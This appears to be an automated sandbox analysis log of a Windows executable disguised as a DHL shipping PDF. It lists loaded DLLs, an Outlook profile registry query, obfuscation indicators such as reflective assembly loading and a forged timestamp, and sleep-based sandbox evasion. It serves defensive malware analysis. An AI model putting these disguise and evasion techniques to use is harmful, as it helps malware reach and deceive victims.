                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: iconcodecservice.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: secur32.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.cs .Net Code: n1XkyJdOW8 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.cs .Net Code: n1XkyJdOW8 System.Reflection.Assembly.Load(byte[])
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: 0xEC09643B [Mon Jun 27 18:40:59 2095 UTC]
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: section name: AGB[a"h3
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: section name:
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A18EC00 push esp; ret 0_2_0A18EC11
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A692A2A pushfd ; ret 0_2_0A692A31
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A69C0B1 push E80C568Dh; iretd 0_2_0A69C04D
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A690634 push 26BA5A65h; retf 0_2_0A69063C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A6934A8 pushad ; retf 0_2_0A6934A9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A6934AA push eax; retf 0_2_0A6934B1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A747D60 push eax; ret 0_2_0A748181
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0A74364F push E801025Eh; retf 0_2_0A743661
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_0F02487E push ecx; ret 0_2_0F024880
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_0104F273 push ebp; retf 2_2_0104F281
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_01047E59 push edx; iretd 2_2_01047E5A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_06551B4A push es; iretd 2_2_06551C10
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_0655001E push es; retf 2_2_0655001C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_06550006 push es; retf 2_2_0655001C
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: section name: AGB[a"h3 entropy: 7.998392389545792
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static PE information: section name: .text entropy: 7.913790405188838
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack and 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack (multiple .cs files) High entropy of concatenated method names
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match, File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Memory allocated (memory reserve | memory write watch): 2D40000, 2EF0000, 4EF0000, 5620000, 6620000, 6750000, 7750000, C020000, A920000, D020000, E020000, 1040000, 2D50000, 12D0000
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_0F027301 sldt word ptr [eax]
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Thread delayed: delay time: 240000
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Window / User API: threadDelayed 995
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Window / User API: threadDelayed 979
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Window / User API: threadDelayed 3478
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Window / User API: threadDelayed 6350
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952, Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6952, Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6372Thread sleep count: 3478 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6372Thread sleep count: 6350 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599714s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599483s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -599046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598499s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597296s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596968s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596722s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595499s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594952s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594696s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594355s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -594070s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593815s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593646s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6332Thread sleep time: -593405s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239890Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239781Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239671Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239562Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239453Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239344Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239233Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239063Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238632Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599714Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599483Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598937Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597296Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596722Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595937Jump to behavior
